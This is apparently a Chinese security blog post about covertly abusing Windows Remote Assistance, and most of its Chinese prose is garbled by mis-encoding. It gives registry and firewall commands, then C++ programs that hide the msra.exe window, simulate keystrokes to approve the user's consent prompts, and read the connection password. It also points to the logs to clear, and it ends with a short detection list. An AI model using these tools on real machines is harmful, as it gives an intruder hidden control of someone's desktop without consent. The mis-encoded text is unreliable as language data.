I"²2<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>å¯¹äºWindowsç³»ç»Ÿï¼Œç»å¸¸ä¼šç”¨åˆ°è¿œç¨‹æ¡Œé¢æœåŠ¡ï¼Œé€šè¿‡ç•Œé¢å¯¹ç³»ç»Ÿè¿›è¡Œè¿œç¨‹ç®¡ç†ã€‚</p>

<p>è¿™å…¶ä¸­å­˜åœ¨ä¸€ä¸ªä¸è¶³ï¼šä½¿ç”¨è¿œç¨‹æ¡Œé¢æœåŠ¡è¿›è¡Œè¿œç¨‹ç™»å½•(ä½¿ç”¨å¦ä¸€ç”¨æˆ·æˆ–æ˜¯è¸¢æ‰å½“å‰ç”¨æˆ·)ï¼Œæ— æ³•è·å–åˆ°å½“å‰ç”¨æˆ·çš„ç³»ç»ŸçŠ¶æ€ã€‚</p>

<p>å¦‚æœæƒ³è¦æŸ¥çœ‹(ç”šè‡³æ˜¯æ“ä½œ)å½“å‰ç”¨æˆ·çš„æ¡Œé¢ï¼Œæœ‰ä»€ä¹ˆå¥½åŠæ³•å‘¢ï¼Ÿ</p>

<p>è™½ç„¶æˆ‘ä»¬å¯ä»¥é€šè¿‡ç¼–å†™ç¨‹åºæ¥å®ç°ç•Œé¢æ“ä½œï¼ˆæ•è·æ¡Œé¢ä¿¡æ¯ï¼Œå‹ç¼©ä¼ è¾“ï¼Œå‘é€é¼ æ ‡é”®ç›˜æ¶ˆæ¯ç­‰ï¼‰ï¼Œä½†æ˜¯å¦‚æœèƒ½å¤Ÿä½¿ç”¨Windowsç³»ç»Ÿçš„é»˜è®¤åŠŸèƒ½ï¼Œå²‚ä¸æ˜¯æ›´å¥½ï¼Ÿ</p>

<p>ç­”æ¡ˆå°±æ˜¯Windowsç³»ç»Ÿçš„è¿œç¨‹ååŠ©ã€‚</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>è¿œç¨‹ååŠ©çš„åŸºæœ¬æ“ä½œ</li>
  <li>å‘½ä»¤è¡Œä¸‹æ“ä½œ</li>
  <li>ç¼–å†™c++ç¨‹åºéšè—ç•Œé¢ï¼Œå‘é€é”®ç›˜æ¶ˆæ¯ï¼Œæ¨¡æ‹Ÿç”¨æˆ·ç‚¹å‡»ç¡®è®¤</li>
  <li>å®Œæ•´åˆ©ç”¨æµç¨‹</li>
  <li>æ£€æµ‹æ–¹æ³•</li>
</ul>

<h2 id="0x02-è¿œç¨‹ååŠ©çš„åŸºæœ¬æ“ä½œ">0x02 è¿œç¨‹ååŠ©çš„åŸºæœ¬æ“ä½œ</h2>
<hr />

<h3 id="1å¼€å¯è¿œç¨‹ååŠ©åŠŸèƒ½">1ã€å¼€å¯è¿œç¨‹ååŠ©åŠŸèƒ½</h3>

<p><code class="language-plaintext highlighter-rouge">System Properties</code> -&gt; <code class="language-plaintext highlighter-rouge">Remote</code></p>

<p>é€‰ä¸­<code class="language-plaintext highlighter-rouge">Allow Remote Assistance connections to this computer</code></p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-4-4/2-1.png" alt="Alt text" /></p>

<h3 id="2æ·»åŠ é˜²ç«å¢™è§„åˆ™å…è®¸è¿œç¨‹ååŠ©çš„é€šä¿¡ç«¯å£">2ã€æ·»åŠ é˜²ç«å¢™è§„åˆ™ï¼Œå…è®¸è¿œç¨‹ååŠ©çš„é€šä¿¡ç«¯å£</h3>

<p><code class="language-plaintext highlighter-rouge">Windows Firewall</code> -&gt; <code class="language-plaintext highlighter-rouge">Allowed Programs</code></p>

<p>é€‰ä¸­<code class="language-plaintext highlighter-rouge">Remote Assistance</code></p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-4-4/2-2.png" alt="Alt text" /></p>

<h3 id="3å¯åŠ¨ç•Œé¢ç¨‹åº">3ã€å¯åŠ¨ç•Œé¢ç¨‹åº</h3>

<p>è¿è¡Œ -&gt; <code class="language-plaintext highlighter-rouge">msra.exe</code></p>

<h3 id="4é…ç½®æœ¬æœºä¸ºæœåŠ¡ç«¯è¯·æ±‚å…¶ä»–äººååŠ©">4ã€é…ç½®æœ¬æœºä¸ºæœåŠ¡ç«¯ï¼Œè¯·æ±‚å…¶ä»–äººååŠ©</h3>

<p>é€‰ä¸­<code class="language-plaintext highlighter-rouge">Invite someone you trust to help you</code></p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-4-4/2-3.png" alt="Alt text" /></p>

<p>é€‰ä¸­<code class="language-plaintext highlighter-rouge">Save this invitation as a file</code></p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-4-4/2-4.png" alt="Alt text" /></p>

<p>ä¿å­˜ä¸ºæ–‡ä»¶<code class="language-plaintext highlighter-rouge">Invitation.msrcincident</code></p>

<p>è‡ªåŠ¨å¼¹å‡ºç•Œé¢ï¼Œç”Ÿæˆä¸€ä¸ªéšæœºå¯†ç ï¼Œè®°å½•è¯¥å¯†ç ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-4-4/2-5.png" alt="Alt text" /></p>

<h3 id="5æ§åˆ¶ç«¯å‘èµ·è¿œç¨‹è¿æ¥">5ã€æ§åˆ¶ç«¯å‘èµ·è¿œç¨‹è¿æ¥</h3>

<p>æ§åˆ¶ç«¯è¿è¡Œæ–‡ä»¶<code class="language-plaintext highlighter-rouge">Invitation.msrcincident</code>ï¼Œå¡«å…¥ä¸Šä¸€æ­¥ç”Ÿæˆçš„å¯†ç ï¼Œå‘èµ·è¿œç¨‹è¿æ¥</p>

<h3 id="6æœåŠ¡ç«¯ç¡®è®¤è¿æ¥è¯·æ±‚">6ã€æœåŠ¡ç«¯ç¡®è®¤è¿æ¥è¯·æ±‚</h3>

<p>æœåŠ¡ç«¯å¼¹æ¡†ï¼Œéœ€è¦ç”¨æˆ·ç¡®è®¤ï¼Œå…è®¸è¿œç¨‹ååŠ©ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-4-4/2-6.png" alt="Alt text" /></p>

<p>é€‰æ‹©Yesï¼Œè¿œç¨‹ååŠ©æˆåŠŸå»ºç«‹</p>

<h2 id="0x03-å‘½ä»¤è¡Œä¸‹æ“ä½œ">0x03 å‘½ä»¤è¡Œä¸‹æ“ä½œ</h2>
<hr />

<h3 id="1å¼€å¯ç³»ç»Ÿè¿œç¨‹ååŠ©">1ã€å¼€å¯ç³»ç»Ÿè¿œç¨‹ååŠ©</h3>

<p>ä¿®æ”¹æ³¨å†Œè¡¨é¡¹<code class="language-plaintext highlighter-rouge">HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance</code>ä¸‹çš„é”®å€¼<code class="language-plaintext highlighter-rouge">fAllowToGetHelp</code>ï¼Œ1ä»£è¡¨å…è®¸ï¼Œ0ä»£è¡¨ç¦æ­¢</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
</code></pre></div></div>

<h3 id="2é…ç½®é˜²ç«å¢™è§„åˆ™å…è®¸è¿œç¨‹ååŠ©çš„é€šä¿¡ç«¯å£">2ã€é…ç½®é˜²ç«å¢™è§„åˆ™ï¼Œå…è®¸è¿œç¨‹ååŠ©çš„é€šä¿¡ç«¯å£</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>netsh advfirewall firewall set rule group="Remote Assistance" new enable=Yes
</code></pre></div></div>

<h3 id="3åˆ›å»ºè¿œç¨‹ååŠ©æ–‡ä»¶åå°ç­‰å¾…ç”¨æˆ·è¿æ¥">3ã€åˆ›å»ºè¿œç¨‹ååŠ©æ–‡ä»¶ï¼Œåå°ç­‰å¾…ç”¨æˆ·è¿æ¥</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msra /saveasfile c:\test\1.msrcIncident 123456789012
</code></pre></div></div>

<p>ä¿å­˜æ–‡ä»¶è·¯å¾„ä¸º<code class="language-plaintext highlighter-rouge">c:\test\1.msrcIncident</code>ï¼Œè¿æ¥å¯†ç ä¸º<code class="language-plaintext highlighter-rouge">123456789012</code></p>

<h2 id="0x04-ç¼–å†™cç¨‹åºéšè—ç•Œé¢å‘é€é”®ç›˜æ¶ˆæ¯æ¨¡æ‹Ÿç”¨æˆ·ç‚¹å‡»ç¡®è®¤">0x04 ç¼–å†™cç¨‹åºéšè—ç•Œé¢ï¼Œå‘é€é”®ç›˜æ¶ˆæ¯ï¼Œæ¨¡æ‹Ÿç”¨æˆ·ç‚¹å‡»ç¡®è®¤</h2>
<hr />

<h3 id="1éšè—msraexeçš„ç•Œé¢">1ã€éšè—msra.exeçš„ç•Œé¢</h3>

<p>è·å¾—çª—å£å¥æŸ„ï¼Œå°†çª—å£å±æ€§è®¾ç½®ä¸ºéšè—</p>

<p>éœ€è¦æ³¨æ„ä¸åŒè¯­è¨€çš„ç³»ç»Ÿä¸­msra.exeçš„çª—å£æ ‡é¢˜ä¸åŒï¼Œä¾‹å¦‚ä¸­æ–‡ç³»ç»Ÿçš„çª—å£æ ‡é¢˜ä¸º<code class="language-plaintext highlighter-rouge">Windows è¿œç¨‹ååŠ©</code>ï¼Œè‹±æ–‡ç³»ç»Ÿçš„çª—å£æ ‡é¢˜ä¸º<code class="language-plaintext highlighter-rouge">Windows Remote Assistance</code></p>

<p>å¯ä»¥å…ˆå¯¹å½“å‰ç³»ç»Ÿè¯­è¨€ä½œåˆ¤æ–­ï¼Œæ¥ç€å¯»æ‰¾å¯¹åº”çš„çª—å£æ ‡é¢˜</p>

<p>ä¸ºäº†ä½¿ç•Œé¢å®Œå…¨éšè—ï¼Œéœ€è¦åŠ å…¥å¾ªç¯åˆ¤æ–­ï¼Œåªè¦æ‰¾åˆ°msra.exeçš„çª—å£ç«‹å³å¯¹å…¶éšè—</p>

<p>å¯ä¾›å‚è€ƒçš„ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;windows.h&gt;
int main()
{
	char *Title = NULL;
	LANGID lid = GetSystemDefaultLangID();
	printf("[*]LanguageID:0x%04x\n",lid);
	switch (lid)
	{
		case 0X0804:
			printf("[*]Language:Chinese\n",lid);
			Title = "Windows è¿œç¨‹ååŠ©";
			break;
		case 0x0409:
			printf("[*]Language:Englisth\n",lid);
			Title = "Windows Remote Assistance";
			break;
	}
	for(int i=0;i&lt;1;i)
	{
		HWND hwnd = FindWindow(NULL, Title);
		ShowWindow(hwnd, SW_HIDE); 
		Sleep(100);
	}
}
</code></pre></div></div>

<p>ç¼–è¯‘ç”Ÿæˆ<code class="language-plaintext highlighter-rouge">msra-hide.exe</code></p>

<h3 id="2æ¨¡æ‹Ÿè¾“å…¥é”®ç›˜æ¶ˆæ¯å·¦ç®­å¤´-å’Œå›è½¦ç¡®è®¤é”®">2ã€æ¨¡æ‹Ÿè¾“å…¥é”®ç›˜æ¶ˆæ¯ï¼Œå·¦ç®­å¤´(&lt;-)å’Œå›è½¦ç¡®è®¤é”®</h3>

<p>æ­£å¸¸æƒ…å†µä¸‹ï¼Œæ§åˆ¶ç«¯æˆåŠŸè¾“å…¥å¯†ç åï¼ŒæœåŠ¡ç«¯ä¼šå¼¹æ¡†æç¤ºç”¨æˆ·æ˜¯å¦å…è®¸è¿œç¨‹ååŠ©</p>

<p>è¿™é‡Œé€šè¿‡ç¨‹åºå®ç°æ¨¡æ‹Ÿç”¨æˆ·è¾“å…¥ï¼Œé€‰ä¸­<code class="language-plaintext highlighter-rouge">Yes</code>ï¼Œå¯¹åº”çš„é”®ç›˜æ“ä½œä¸ºå·¦ç®­å¤´(&lt;-)å’Œå›è½¦ç¡®è®¤é”®</p>

<p>ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;windows.h&gt;
int main()
{
	char *Title = NULL;
	LANGID lid = GetSystemDefaultLangID();
	printf("[*]LanguageID:0x%04x\n",lid);
	switch (lid)
	{
		case 0X0804:
			printf("[*]Language:Chinese\n",lid);
			Title = "Windows è¿œç¨‹ååŠ©";
			break;
		case 0x0409:
			printf("[*]Language:Englisth\n",lid);
			Title = "Windows Remote Assistance";
			break;
	}
	HWND hwnd = FindWindow(NULL, Title);
	SetActiveWindow(hwnd);
	SetForegroundWindow(hwnd);
	SetFocus(hwnd);
	keybd_event(37,0,0,0);
	keybd_event(37,0,KEYEVENTF_KEYUP,0);
	keybd_event(13,0,0,0);
	keybd_event(13,0,KEYEVENTF_KEYUP,0);
}
</code></pre></div></div>

<p>ç¼–è¯‘ç”Ÿæˆ<code class="language-plaintext highlighter-rouge">msra-allow.exe</code></p>

<h3 id="3æ‰©å±•è·å¾—è¿œç¨‹ååŠ©çª—å£çš„è¿æ¥å¯†ç ">3ã€æ‰©å±•ï¼šè·å¾—è¿œç¨‹ååŠ©çª—å£çš„è¿æ¥å¯†ç </h3>

<p>é€šè¿‡æšä¸¾å­çª—å£è·å¾—è¿æ¥å¯†ç </p>

<p>ä½¿ç”¨API FindWindowè·å¾—çª—å£å¥æŸ„</p>

<p>ä½¿ç”¨API EnumChildWindowséå†çª—å£æ‰€æœ‰å­çª—å£ï¼Œè·å¾—å¯†ç å†…å®¹</p>

<p>API EnumChildWindowsä¼šè‡ªåŠ¨æšä¸¾ï¼Œç›´è‡³è·å¾—æœ€åä¸€ä¸ªå­çª—å£æˆ–è€…å‡½æ•°è¿”å›0</p>

<p>å®é™…æµ‹è¯•å‘ç°ç¬¬äºŒä¸ªå­çª—å£ä¿å­˜å¯†ç ï¼Œæ‰€ä»¥åœ¨è·å¾—å¯†ç åå‡½æ•°è¿”å›0æå‰ç»“æŸæšä¸¾</p>

<p>ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;windows.h&gt;
int status = 0;
BOOL CALLBACK EnumMainWindow(HWND hwnd, LPARAM lParam)
{
	const int BufferSize = 1024;
	char BufferContent[BufferSize] = "";
	SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
	status++;
	if (status == 2)
	{
		printf("[+]Find Password\n");      
		printf("%s\n", BufferContent);
		return 0;
	}
	return 1;
}
int main()
{
	char *Title = NULL;
	LANGID lid = GetSystemDefaultLangID();
	printf("[*]LanguageID:0x%04x\n",lid);
	switch (lid)
	{
		case 0X0804:
			printf("[*]Language:Chinese\n",lid);
			Title = "Windows è¿œç¨‹ååŠ©";
            break;
       case 0x0409:
			printf("[*]Language:Englisth\n",lid);
			Title = "Windows Remote Assistance";
            break;
    }     
	HWND hwnd = FindWindow(NULL, Title);
	if(hwnd)
	{
		printf("[+]Find Window\n");     
		EnumChildWindows(hwnd, EnumMainWindow, 0);
	}
	else
	{
		printf("[!]No Window\n");  
	}
} 
</code></pre></div></div>

<p>æµ‹è¯•å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-4-4/3-1.png" alt="Alt text" /></p>

<h2 id="0x05-å®Œæ•´åˆ©ç”¨æµç¨‹">0x05 å®Œæ•´åˆ©ç”¨æµç¨‹</h2>
<hr />

<h3 id="1å¼€å¯è¿œç¨‹ååŠ©">1ã€å¼€å¯è¿œç¨‹ååŠ©</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall set rule group="Remote Assistance" new enable=Yes
</code></pre></div></div>

<h3 id="2è¿è¡Œæ‹¦æˆªç¨‹åºmsra-hideexeéšè—msraçª—å£">2ã€è¿è¡Œæ‹¦æˆªç¨‹åºmsra-hide.exeï¼Œéšè—msraçª—å£</h3>

<p>éœ€è¦ç®¡ç†å‘˜æƒé™</p>

<h3 id="3ç”Ÿæˆè¿œç¨‹ååŠ©é‚€è¯·æ–‡ä»¶">3ã€ç”Ÿæˆè¿œç¨‹ååŠ©é‚€è¯·æ–‡ä»¶</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msra /saveasfile c:\test\1.msrcIncident 123456789012
</code></pre></div></div>

<h3 id="4æ§åˆ¶ç«¯è¿›è¡Œè¿æ¥">4ã€æ§åˆ¶ç«¯è¿›è¡Œè¿æ¥</h3>

<p>è·å¾—æ–‡ä»¶<code class="language-plaintext highlighter-rouge">1.msrcIncident</code>å¹¶æ‰§è¡Œï¼Œè¾“å…¥è¿æ¥å¯†ç </p>

<h3 id="5è¿è¡Œæ¨¡æ‹Ÿé”®ç›˜è¾“å…¥ç¨‹åºmsra-allowexeå…è®¸è¿œç¨‹ååŠ©">5ã€è¿è¡Œæ¨¡æ‹Ÿé”®ç›˜è¾“å…¥ç¨‹åºmsra-allow.exeï¼Œå…è®¸è¿œç¨‹ååŠ©</h3>

<p>éœ€è¦ç®¡ç†å‘˜æƒé™</p>

<h3 id="6æ§åˆ¶ç«¯è·å¾—è¿œç¨‹ååŠ©çš„æ¡Œé¢">6ã€æ§åˆ¶ç«¯è·å¾—è¿œç¨‹ååŠ©çš„æ¡Œé¢</h3>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-4-4/4-1.png" alt="Alt text" /></p>

<h3 id="7æ§åˆ¶ç«¯è¯·æ±‚è·å¾—æœåŠ¡ç«¯çš„é¼ æ ‡æ“ä½œæƒé™">7ã€æ§åˆ¶ç«¯è¯·æ±‚è·å¾—æœåŠ¡ç«¯çš„é¼ æ ‡æ“ä½œæƒé™</h3>

<p>åœ¨æ§åˆ¶ç•Œé¢é€‰æ‹©<code class="language-plaintext highlighter-rouge">è¯·æ±‚æ§åˆ¶</code></p>

<h3 id="8å†æ¬¡è¿è¡Œæ¨¡æ‹Ÿé”®ç›˜è¾“å…¥ç¨‹åºmsra-allowexeå…è®¸é¼ æ ‡æ“ä½œ">8ã€å†æ¬¡è¿è¡Œæ¨¡æ‹Ÿé”®ç›˜è¾“å…¥ç¨‹åºmsra-allow.exeï¼Œå…è®¸é¼ æ ‡æ“ä½œ</h3>

<p>éœ€è¦ç®¡ç†å‘˜æƒé™</p>

<p>æ§åˆ¶ç«¯æˆåŠŸè·å¾—æ§åˆ¶æœåŠ¡ç«¯é¼ æ ‡</p>

<p>è‡³æ­¤ï¼ŒæˆåŠŸè·å¾—ç›®æ ‡ç³»ç»Ÿçš„æ¡Œé¢æ“ä½œæƒé™</p>

<h3 id="9æ¸…é™¤è¿æ¥è®°å½•">9ã€æ¸…é™¤è¿æ¥è®°å½•</h3>

<p>è¿œç¨‹ååŠ©çš„è®°å½•ä¿å­˜ä½ç½®ï¼š<code class="language-plaintext highlighter-rouge">%SystemDrive%\Users\user_name\Documents\Remote Assistance Logs</code></p>

<p>å‘½åè§„åˆ™: <code class="language-plaintext highlighter-rouge">YYYYMMDDHHMMSS.xml</code> (24å°æ—¶æ—¶é—´æ ¼å¼)</p>

<p>æ—¥å¿—æ–‡ä»¶å†…ä¿å­˜è¿æ¥æ—¶é—´</p>

<h2 id="0x06-æ£€æµ‹æ–¹æ³•">0x06 æ£€æµ‹æ–¹æ³•</h2>
<hr />

<p>æœ¬æ–‡ä»‹ç»çš„æ–¹æ³•å‰ææ˜¯å·²ç»å–å¾—äº†ç³»ç»Ÿçš„ç®¡ç†å‘˜æƒé™ï¼Œä»£è¡¨è¯¥ç³»ç»Ÿå·²ç»è¢«æ”»ç ´</p>

<p>ç»“åˆåˆ©ç”¨æ€è·¯ï¼Œå¯ä»¥é€šè¿‡ä»¥ä¸‹æ–¹æ³•æ£€æµ‹ï¼š</p>

<ul>
  <li>æ³¨å†Œè¡¨<code class="language-plaintext highlighter-rouge">HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance</code>é”®å€¼è¢«ä¿®æ”¹</li>
  <li>é˜²ç«å¢™è§„åˆ™è¢«ä¿®æ”¹</li>
  <li>å¯åŠ¨è¿›ç¨‹msra.exe</li>
  <li>ç”Ÿæˆæ–°æ–‡ä»¶å¤¹<code class="language-plaintext highlighter-rouge">%SystemDrive%\Users\user_name\Documents\Remote Assistance Logs</code></li>
  <li>å¼€æ”¾çš„å¼‚å¸¸ç«¯å£</li>
</ul>

<h2 id="0x07-å°ç»“">0x07 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡å¯¹Windowsè¿œç¨‹ååŠ©çš„åŠŸèƒ½è¿›è¡Œäº†ä»‹ç»ï¼Œç¼–å†™ç¨‹åºå®ç°Windowsè¿œç¨‹ååŠ©çš„éšè”½æ‰§è¡Œï¼Œç»“åˆåˆ©ç”¨æ€è·¯ç»™å‡ºæ£€æµ‹æ–¹æ³•</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET